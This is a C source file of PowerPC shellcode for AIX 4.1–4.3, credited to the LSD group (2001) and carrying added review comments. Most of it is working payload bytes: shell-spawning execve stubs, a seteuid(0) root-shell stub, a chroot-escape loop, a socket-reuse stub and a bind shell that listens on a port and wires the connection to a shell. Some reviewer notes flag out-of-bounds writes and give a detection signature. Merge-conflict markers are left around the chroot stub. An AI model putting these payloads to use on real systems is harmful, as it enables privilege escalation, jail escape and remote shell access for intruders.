/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland        *://lsd-pl.net/ #*/
/*## asmcodes for aix 4.1 4.2 4.3 power/powerpc                              #*/

/*
syscall     %r2  %r2  %r2  %r3,%r4,%r5
----------- ---- ---- ---- -----------------------------------------------------
execve      x003 x002 x004 ->path="/bin/sh",->[->a0=path,0],0
execve      x003 x002 x004 ->path="/bin/sh",->[->a0=path,->a1="-c",->a2=cmd,0],0
seteuid     x068 x071 x082 euid=0
mkdir       x07f x08e x0a0 ->path="t..",mode= (each value is valid)
chroot      x06f x078 x089 ->path={"t..","."}
chdir       x06d x076 x087 ->path=".."
getpeername x041 x046 x053 sfd,->sadr=[],->[len=0x2c]
socket      x057 x05b x069 AF_INET=2,SOCK_STREAM=1,prot=0
bind        x056 x05a x068 sfd,->sadr=[0x2c,0x02,hi,lo,0,0,0,0],len=0x10
listen      x055 x059 x067 sfd,backlog=5
accept      x053 x058 x065 sfd,0,0
close       x05e x062 x071 fd={0,1,2}
kfcntl      x0d6 x0e7 x0fc sfd,F_DUPFD=0,fd={0,1,2}
            v4.1 v4.2 v4.3 
*/

#if defined(POWERPC) && defined(AIX)

/*
 * _shellcode -- standalone execve("/bin/sh") stub (first execve row of
 * the table above).  Layout: 12 instruction words, "/bin/sh" at offset
 * 48, then one trailing byte chosen by V41/V42/V43 holding that
 * release's execve number (0x03/0x02/0x04).  The bnel/mflr pair at the
 * top loads the stub's own address, so the stub is position independent;
 * every data offset below is relative to r31 = start+0x128.
 * NOTE(review): with none of V41/V42/V43 defined the trailing byte is
 * absent and the lbz at -241(r31) reads the string's NUL terminator
 * instead; there is no #error guard for that configuration.
 * NOTE(review): the two st instructions (-240/-236) resolve to offsets
 * 56..63, i.e. just past the last byte of this array.
 * Detection note: crorc cr6,cr6,cr6 immediately followed by svca is the
 * syscall-entry sequence shared by every stub in this file.
 */
char _shellcode[]=         /* 12*4+8 bytes                 */
    "\x7c\xa5\x2a\x79"     /* xor.    r5,r5,r5      r5 = 0 */
    "\x40\x82\xff\xfd"     /* bnel    <_shellcode>         */
    "\x7f\xe8\x02\xa6"     /* mflr    r31 = start+8        */
    "\x3b\xff\x01\x20"     /* cal     r31,0x120(r31)       */
    "\x38\x7f\xff\x08"     /* cal     r3,-248(r31)  path   */
    "\x38\x9f\xff\x10"     /* cal     r4,-240(r31)  argv   */
    "\x90\x7f\xff\x10"     /* st      r3,-240(r31)  argv[0]*/
    "\x90\xbf\xff\x14"     /* st      r5,-236(r31)  argv[1]*/
    "\x88\x5f\xff\x0f"     /* lbz     r2,-241(r31)  number */
    "\x98\xbf\xff\x0f"     /* stb     r5,-241(r31)  -> NUL */
    "\x4c\xc6\x33\x42"     /* crorc   cr6,cr6,cr6          */
    "\x44\xff\xff\x02"     /* svca                         */
    "/bin/sh"              /* offset 48                    */
#ifdef V41
    "\x03"                 /* execve number, 4.1           */
#endif
#ifdef V42
    "\x02"                 /* execve number, 4.2           */
#endif
#ifdef V43
    "\x04"                 /* execve number, 4.3           */
#endif
;

/*
 * _setreuidshellcode -- seteuid(0) followed by execve("/bin/sh") in one
 * self-contained stub.  Layout: 10 instruction words, a 4-byte data word
 * chosen by V41/V42/V43 (the release's seteuid and execve numbers from
 * the table above, then two bytes no offset below refers to), 8 more
 * instruction words, then "/bin/sh" at offset 76.  Offsets are relative
 * to r21 = start+0x148; the two syscall numbers are read from
 * -288/-287(r21), i.e. offsets 40 and 41.  mtlr r22 (r22 = start+44)
 * before the first svca appears to make the syscall return into the
 * second half of the stub -- consistent with the bctrl-based stubs below,
 * but confirm against the AIX svca convention.  r20 stays 0 throughout
 * and supplies the euid, envp and the argv terminator.
 * NOTE(review): as with _shellcode there is no #error when no V4x macro
 * is defined; the data word is then missing and every offset past it
 * shifts by 4.
 * NOTE(review): st r3,-244(r21) / st r20,-240(r21) write offsets 84..91,
 * past the end of this array.
 */
char _setreuidshellcode[]= /* 19*4+7 bytes                   */
    "\x7e\x94\xa2\x79"     /* xor.    r20,r20,r20   r20 = 0  */
    "\x40\x82\xff\xfd"     /* bnel    <_setreuidshellcode>   */
    "\x7e\xa8\x02\xa6"     /* mflr    r21 = start+8          */
    "\x3a\xb5\x01\x40"     /* cal     r21,0x140(r21)         */
    "\x88\x55\xfe\xe0"     /* lbz     r2,-288(r21)  seteuid  */
    "\x7e\x83\xa3\x78"     /* mr      r3,r20        euid = 0 */
    "\x3a\xd5\xfe\xe4"     /* cal     r22,-284(r21) = +44    */
    "\x7e\xc8\x03\xa6"     /* mtlr    r22                    */
    "\x4c\xc6\x33\x42"     /* crorc   cr6,cr6,cr6            */
    "\x44\xff\xff\x02"     /* svca                           */
#ifdef V41
    "\x68\x03\xff\xff"     /* seteuid, execve (4.1), 2 unused*/
#endif
#ifdef V42
    "\x71\x02\xff\xff"     /* seteuid, execve (4.2), 2 unused*/
#endif
#ifdef V43
    "\x82\x04\xff\xff"     /* seteuid, execve (4.3), 2 unused*/
#endif
    "\x38\x75\xff\x04"     /* cal     r3,-252(r21)  path     */
    "\x38\x95\xff\x0c"     /* cal     r4,-244(r21)  argv     */
    "\x7e\x85\xa3\x78"     /* mr      r5,r20        envp = 0 */
    "\x90\x75\xff\x0c"     /* st      r3,-244(r21)  argv[0]  */
    "\x92\x95\xff\x10"     /* st      r20,-240(r21) argv[1]  */
    "\x88\x55\xfe\xe1"     /* lbz     r2,-287(r21)  execve   */
    "\x9a\x95\xff\x0b"     /* stb     r20,-245(r21) path NUL */
    "\x4b\xff\xff\xd8"     /* bl      <_setreuidshellcode+32>*/
    "/bin/sh"              /* offset 76                      */
;

/*
 * syscallcode -- common prologue for the stubs that follow (shellcode,
 * cmdshellcode, setreuidcode, chrootcode, findsckcode, bindsckcode).
 * Layout: 8 instruction words, a 12-byte table of syscall numbers chosen
 * by V41/V42/V43, then the crorc/svca pair (offset 44) and a final cal
 * (offset 52).  The table holds, in order, the release's numbers for
 * execve, seteuid, getpeername, close, chdir, mkdir, chroot, kfcntl,
 * socket, bind, listen, accept (compare the header table).  Register
 * state the other stubs rely on afterwards:
 *   r20 = 0
 *   r21 = address of the crorc/svca pair; the stubs do mtctr r21 /
 *         bctrl and fetch their number as lbz r2,-12..-1(r21)
 *   r22 = 0x1ff, base for the small constants built with cal below
 * The bctr lands on the final cal, which then falls off the end of this
 * array into whatever the caller placed after it.
 * NOTE(review): no #error when no V4x macro is defined -- the table is
 * then missing and r21 points 12 bytes past the svca.
 */
char syscallcode[]=        /* 14*4 bytes                     */
    "\x7e\x94\xa2\x79"     /* xor.    r20,r20,r20   r20 = 0  */
    "\x40\x82\xff\xfd"     /* bnel    <syscallcode>          */
    "\x7e\xa8\x02\xa6"     /* mflr    r21 = start+8          */
    "\x3a\xc0\x01\xff"     /* lil     r22,0x1ff              */
    "\x3a\xf6\xfe\x2d"     /* cal     r23,-467(r22)  = 44    */
    "\x7e\xb5\xba\x14"     /* cax     r21,r21,r23 = start+52 */
    "\x7e\xa9\x03\xa6"     /* mtctr   r21                    */
    "\x4e\x80\x04\x20"     /* bctr    -> final cal           */
#ifdef V41
    "\x03\x68\x41\x5e"     /* 4.1: execve seteuid getpeername close */
    "\x6d\x7f\x6f\xd6"     /*      chdir mkdir chroot kfcntl */
    "\x57\x56\x55\x53"     /*      socket bind listen accept */
#endif
#ifdef V42
    "\x02\x71\x46\x62"     /* 4.2: execve seteuid getpeername close */
    "\x76\x8e\x78\xe7"     /*      chdir mkdir chroot kfcntl */
    "\x5b\x5a\x59\x58"     /*      socket bind listen accept */
#endif
#ifdef V43
    "\x04\x82\x53\x71"     /* 4.3: execve seteuid getpeername close */
    "\x87\xa0\x89\xfc"     /*      chdir mkdir chroot kfcntl */
    "\x69\x68\x67\x65"     /*      socket bind listen accept */
#endif
    "\x4c\xc6\x33\x42"     /* crorc   cr6,cr6,cr6   offset 44*/
    "\x44\xff\xff\x02"     /* svca    0x0                    */
    "\x3a\xb5\xff\xf8"     /* cal     r21,-8(r21) = start+44 */
;

/*
 * shellcode -- execve("/bin/sh") variant that must be preceded by
 * syscallcode: it takes the execve number from -12(r21) and enters the
 * crorc/svca pair through ctr instead of carrying its own.  Layout: 12
 * instruction words then "/bin/sh" at offset 48; r31 = start+0x128.
 * NOTE(review): as in _shellcode, the st at -240/-236(r31) write
 * offsets 56..63, past the end of this array.
 */
char shellcode[]=          /* 12*4+7 bytes                   */
    "\x7c\xa5\x2a\x79"     /* xor.    r5,r5,r5      r5 = 0   */
    "\x40\x82\xff\xfd"     /* bnel    <shellcode>            */
    "\x7f\xe8\x02\xa6"     /* mflr    r31 = start+8          */
    "\x3b\xff\x01\x20"     /* cal     r31,0x120(r31)         */
    "\x38\x7f\xff\x08"     /* cal     r3,-248(r31)  path     */
    "\x38\x9f\xff\x10"     /* cal     r4,-240(r31)  argv     */
    "\x90\x7f\xff\x10"     /* st      r3,-240(r31)  argv[0]  */
    "\x90\xbf\xff\x14"     /* st      r5,-236(r31)  argv[1]  */
    "\x88\x55\xff\xf4"     /* lbz     r2,-12(r21)   execve   */
    "\x98\xbf\xff\x0f"     /* stb     r5,-241(r31)  path NUL */
    "\x7e\xa9\x03\xa6"     /* mtctr   r21                    */
    "\x4e\x80\x04\x20"     /* bctr    -> crorc/svca          */
    "/bin/sh"              /* offset 48                      */
;

/*
 * cmdshellcode -- execve("/bin/sh","-c",cmd) variant (second execve row
 * of the header table), also dependent on syscallcode for r21.  Layout:
 * 17 instruction words, the 12-byte string "/bin/sh -c  " at offset 68,
 * and the caller-appended command at offset 80.  r31 = start+0x134.
 * The two stb r5 (-233/-230) zero the spaces at offsets 75 and 78,
 * splitting the string in place into "/bin/sh", "-c" and the command.
 * The 4-word argv array is written at -312..-300(r31), i.e. offsets
 * -4..11: one word BEFORE the array start and over the stub's first three
 * instructions (already executed by then).
 * NOTE(review): nothing in the stub terminates the appended command; the
 * caller's copy has to supply the NUL.
 */
char cmdshellcode[]=       /* 17*4+12+cmdlen bytes           */
    "\x7c\xa5\x2a\x79"     /* xor.    r5,r5,r5      r5 = 0   */
    "\x40\x82\xff\xfd"     /* bnel    <cmdshellcode>         */
    "\x7f\xe8\x02\xa6"     /* mflr    r31 = start+8          */
    "\x3b\xff\x01\x2c"     /* cal     r31,0x12c(r31)         */
    "\x38\x7f\xff\x10"     /* cal     r3,-240(r31)  path     */
    "\x38\x9f\xfe\xc8"     /* cal     r4,-312(r31)  argv     */
    "\x38\xdf\xff\x18"     /* cal     r6,-232(r31)  "-c"     */
    "\x38\xff\xff\x1c"     /* cal     r7,-228(r31)  command  */
    "\x90\x7f\xfe\xc8"     /* st      r3,-312(r31)  argv[0]  */
    "\x90\xdf\xfe\xcc"     /* st      r6,-308(r31)  argv[1]  */
    "\x90\xff\xfe\xd0"     /* st      r7,-304(r31)  argv[2]  */
    "\x90\xbf\xfe\xd4"     /* st      r5,-300(r31)  argv[3]  */
    "\x98\xbf\xff\x17"     /* stb     r5,-233(r31)  NUL @75  */
    "\x98\xbf\xff\x1a"     /* stb     r5,-230(r31)  NUL @78  */
    "\x88\x55\xff\xf4"     /* lbz     r2,-12(r21)   execve   */
    "\x7e\xa9\x03\xa6"     /* mtctr   r21                    */
    "\x4e\x80\x04\x20"     /* bctr    -> crorc/svca          */
    "/bin/sh -c  "         /* offset 68, two trailing spaces */
    /* command appended by the caller at offset 80 */
;

/*
 * setreuidcode -- seteuid(r20) through the syscallcode convention: the
 * number comes from -11(r21) (seteuid slot of the table), the argument
 * is r3 = r20 (zero after syscallcode), and the call goes through
 * mtctr r21 / bctrl.  4 instruction words, no data; unlike
 * _setreuidshellcode it cannot run on its own.
 */
char setreuidcode[]=       /* 4*4 bytes                      */
    "\x88\x55\xff\xf5"     /* lbz     r2,-11(r21)   seteuid  */
    "\x7e\x83\xa3\x78"     /* mr      r3,r20        euid = 0 */
    "\x7e\xa9\x03\xa6"     /* mtctr   r21                    */
    "\x4e\x80\x04\x21"     /* bctrl   -> crorc/svca          */
;

<<<<<<< deleted
=======
/*
 * chrootcode -- the mkdir/chroot/chdir sequence of the header table:
 * mkdir("t.."), chroot("t.."), 0x101 times chdir(".."), chroot(".").
 * Uses syscallcode's r21 convention (numbers at -7/-6/-8(r21)).  The
 * first instruction doubles as the data: its bytes 0x2c 0x74 0x2e 0x2e
 * hold "t.." from offset 1, and st r20,-4(r24) (r20 = 0) overwrites the
 * already-executed beql with the terminating NUL, so with r24 = start+8
 * the paths -7/-6/-5(r24) read "t..", ".." and ".".  Note r4 (mkdir
 * mode) is never set -- the header table says any value is accepted.
 * Branch targets in the comments are byte offsets from the array start.
 */
char chrootcode[]=         /* 23*4 bytes                     */
    "\x2c\x74\x2e\x2e"     /* cmpi     cr0,r20,0x2e2e  data  */
    "\x41\x82\xff\xfd"     /* beql     <chrootcode>          */
    "\x7f\x08\x02\xa6"     /* mflr     r24 = start+8         */
    "\x92\x98\xff\xfc"     /* st       r20,-4(r24)  NUL @4..7*/
    "\x38\x78\xff\xf9"     /* cal      r3,-7(r24)   "t.."    */
    "\x88\x55\xff\xf9"     /* lbz      r2,-7(r21)   mkdir    */
    "\x7e\xa9\x03\xa6"     /* mtctr    r21                   */
    "\x4e\x80\x04\x21"     /* bctrl                          */
    "\x38\x78\xff\xf9"     /* cal      r3,-7(r24)   "t.."    */
    "\x88\x55\xff\xfa"     /* lbz      r2,-6(r21)   chroot   */
    "\x7e\xa9\x03\xa6"     /* mtctr    r21                   */
    "\x4e\x80\x04\x21"     /* bctrl                          */
    "\x3b\x20\x01\x01"     /* lil      r25,0x101    counter  */
    "\x38\x78\xff\xfa"     /* cal      r3,-6(r24)   ".."     */
    "\x88\x55\xff\xf8"     /* lbz      r2,-8(r21)   chdir    */
    "\x7e\xa9\x03\xa6"     /* mtctr    r21                   */
    "\x4e\x80\x04\x21"     /* bctrl                          */
    "\x37\x39\xff\xff"     /* ai.      r25,r25,-1            */
    "\x40\x82\xff\xec"     /* bne      <chrootcode+52>       */
    "\x38\x78\xff\xfb"     /* cal      r3,-5(r24)   "."      */
    "\x88\x55\xff\xfa"     /* lbz      r2,-6(r21)   chroot   */
    "\x7e\xa9\x03\xa6"     /* mtctr    r21                   */
    "\x4e\x80\x04\x21"     /* bctrl                          */
;
>>>>>>> added

/*
 * findsckcode -- walks descriptors downward from 0x101 calling
 * getpeername on each, looking for the one whose peer port equals the
 * 16-bit immediate of the first instruction (0x1234 at byte offset 2,
 * see FINDSCKPORTOFS); then closes 2,1,0 and kfcntl(F_DUPFD)'s the
 * match onto them.  Uses syscallcode's r21/r22 (numbers at -10/-9/-5
 * (r21); constants built from r22 = 0x1ff).  r24 = start+8; the
 * sockaddr buffer and its length word are placed at -4(r24) and
 * -12(r24), i.e. on top of the stub's own first words, so the halfword
 * read at -2(r24) is the port field of the returned address (compare
 * the sadr layout in the header table).  r26 is decremented before the
 * port compare, hence the r26+r27 (= fd) when duplicating.
 * Branch targets in the comments are byte offsets from the array start,
 * recomputed from the encoded displacements.
 */
char findsckcode[]=        /* 38*4 bytes                     */
    "\x2c\x74\x12\x34"     /* cmpi    cr0,r20,0x1234  port   */
    "\x41\x82\xff\xfd"     /* beql    <findsckcode>          */
    "\x7f\x08\x02\xa6"     /* mflr    r24 = start+8          */
    "\x3b\x36\xfe\x2d"     /* cal     r25,-467(r22)  = 44    */
    "\x3b\x40\x01\x01"     /* lil     r26,0x101     first fd */
    "\x7f\x78\xca\x14"     /* cax     r27,r24,r25 = start+52 */
    "\x7f\x69\x03\xa6"     /* mtctr   r27                    */
    "\x4e\x80\x04\x20"     /* bctr    <findsckcode+52>       */
    "\xa3\x78\xff\xfe"     /* lhz     r27,-2(r24)  peer port */
    "\xa3\x98\xff\xfa"     /* lhz     r28,-6(r24)  wanted    */
    "\x7c\x1b\xe0\x40"     /* cmpl    cr0,r27,r28            */
    "\x3b\x36\xfe\x59"     /* cal     r25,-423(r22)  = 88    */
    "\x41\x82\xff\xe4"     /* beq     <findsckcode+20>       */
    "\x7f\x43\xd3\x78"     /* mr      r3,r26        fd       */
    "\x38\x98\xff\xfc"     /* cal     r4,-4(r24)    sadr     */
    "\x38\xb8\xff\xf4"     /* cal     r5,-12(r24)   &len     */
    "\x93\x38\xff\xf4"     /* st      r25,-12(r24)  len = 88 */
    "\x88\x55\xff\xf6"     /* lbz     r2,-10(r21)  getpeername*/
    "\x7e\xa9\x03\xa6"     /* mtctr   r21                    */
    "\x4e\x80\x04\x21"     /* bctrl                          */
    "\x37\x5a\xff\xff"     /* ai.     r26,r26,-1             */
    "\x2d\x03\xff\xff"     /* cmpi    cr2,r3,-1              */
    "\x40\x8a\xff\xc8"     /* bne     cr2,<findsckcode+32>   */
    "\x40\x82\xff\xd8"     /* bne     <findsckcode+52>       */
    "\x3b\x36\xfe\x03"     /* cal     r25,-509(r22)  = 2     */
    "\x3b\x76\xfe\x02"     /* cal     r27,-510(r22)  = 1     */
    "\x7f\x23\xcb\x78"     /* mr      r3,r25        fd 2..0  */
    "\x88\x55\xff\xf7"     /* lbz     r2,-9(r21)    close    */
    "\x7e\xa9\x03\xa6"     /* mtctr   r21                    */
    "\x4e\x80\x04\x21"     /* bctrl                          */
    "\x7c\x7a\xda\x14"     /* cax     r3,r26,r27   matched fd*/
    "\x7e\x84\xa3\x78"     /* mr      r4,r20       F_DUPFD=0 */
    "\x7f\x25\xcb\x78"     /* mr      r5,r25                 */
    "\x88\x55\xff\xfb"     /* lbz     r2,-5(r21)    kfcntl   */
    "\x7e\xa9\x03\xa6"     /* mtctr   r21                    */
    "\x4e\x80\x04\x21"     /* bctrl                          */
    "\x37\x39\xff\xff"     /* ai.     r25,r25,-1             */
    "\x40\x80\xff\xd4"     /* bge     <findsckcode+104>      */
;

/*
 * bindsckcode -- socket/bind/listen/accept on the port held in the
 * first instruction's immediate (0x1234 at byte offset 2, see
 * BINDSCKPORTOFS), then close 2,1,0 and kfcntl(F_DUPFD) the accepted
 * descriptor onto them.  Uses syscallcode's r21/r22 (numbers at
 * -4/-3/-2/-1/-9/-5(r21); AF_INET=2, SOCK_STREAM=1, len=0x10 and
 * backlog=5 are built from r22 = 0x1ff).  r24 = start+8; the sockaddr
 * handed to bind is the stub's own first 8 bytes: 0x2c is the length
 * byte, stb r3,-7(r24) writes AF_INET over the 0x74, the 0x1234
 * immediate is the port and st r20,-4(r24) zeroes the address word --
 * exactly the sadr row of the header table.
 * Branch targets in the comments are byte offsets from the array start.
 */
char bindsckcode[]=        /* 42*4 bytes                     */
    "\x2c\x74\x12\x34"     /* cmpi    cr0,r20,0x1234  sadr   */
    "\x41\x82\xff\xfd"     /* beql    <bindsckcode>          */
    "\x7f\x08\x02\xa6"     /* mflr    r24 = start+8          */
    "\x92\x98\xff\xfc"     /* st      r20,-4(r24)  addr = 0  */
    "\x38\x76\xfe\x03"     /* cal     r3,-509(r22)  AF_INET  */
    "\x38\x96\xfe\x02"     /* cal     r4,-510(r22) SOCK_STREAM*/
    "\x98\x78\xff\xf9"     /* stb     r3,-7(r24)   family    */
    "\x7e\x85\xa3\x78"     /* mr      r5,r20       prot = 0  */
    "\x88\x55\xff\xfc"     /* lbz     r2,-4(r21)   socket    */
    "\x7e\xa9\x03\xa6"     /* mtctr   r21                    */
    "\x4e\x80\x04\x21"     /* bctrl                          */
    "\x7c\x79\x1b\x78"     /* mr      r25,r3       sfd       */
    "\x38\x98\xff\xf8"     /* cal     r4,-8(r24)   sadr      */
    "\x38\xb6\xfe\x11"     /* cal     r5,-495(r22) len = 16  */
    "\x88\x55\xff\xfd"     /* lbz     r2,-3(r21)   bind      */
    "\x7e\xa9\x03\xa6"     /* mtctr   r21                    */
    "\x4e\x80\x04\x21"     /* bctrl                          */
    "\x7f\x23\xcb\x78"     /* mr      r3,r25       sfd       */
    "\x38\x96\xfe\x06"     /* cal     r4,-506(r22) backlog 5 */
    "\x88\x55\xff\xfe"     /* lbz     r2,-2(r21)   listen    */
    "\x7e\xa9\x03\xa6"     /* mtctr   r21                    */
    "\x4e\x80\x04\x21"     /* bctrl                          */
    "\x7f\x23\xcb\x78"     /* mr      r3,r25       sfd       */
    "\x7e\x84\xa3\x78"     /* mr      r4,r20       0         */
    "\x7e\x85\xa3\x78"     /* mr      r5,r20       0         */
    "\x88\x55\xff\xff"     /* lbz     r2,-1(r21)   accept    */
    "\x7e\xa9\x03\xa6"     /* mtctr   r21                    */
    "\x4e\x80\x04\x21"     /* bctrl                          */
    "\x7c\x79\x1b\x78"     /* mr      r25,r3       accepted  */
    "\x3b\x56\xfe\x03"     /* cal     r26,-509(r22)  = 2     */
    "\x7f\x43\xd3\x78"     /* mr      r3,r26       fd 2..0   */
    "\x88\x55\xff\xf7"     /* lbz     r2,-9(r21)   close     */
    "\x7e\xa9\x03\xa6"     /* mtctr   r21                    */
    "\x4e\x80\x04\x21"     /* bctrl                          */
    "\x7f\x23\xcb\x78"     /* mr      r3,r25       accepted  */
    "\x7e\x84\xa3\x78"     /* mr      r4,r20       F_DUPFD=0 */
    "\x7f\x45\xd3\x78"     /* mr      r5,r26                 */
    "\x88\x55\xff\xfb"     /* lbz     r2,-5(r21)   kfcntl    */
    "\x7e\xa9\x03\xa6"     /* mtctr   r21                    */
    "\x4e\x80\x04\x21"     /* bctrl                          */
    "\x37\x5a\xff\xff"     /* ai.     r26,r26,-1             */
    "\x40\x80\xff\xd4"     /* bge     <bindsckcode+120>      */
;

/*
 * Byte offset of the 16-bit 0x1234 immediate inside the first
 * instruction of findsckcode / bindsckcode -- presumably the spot where
 * the caller patches in the big-endian port; confirm against the caller.
 */
#define FINDSCKPORTOFS     2
#define BINDSCKPORTOFS     2

#endif
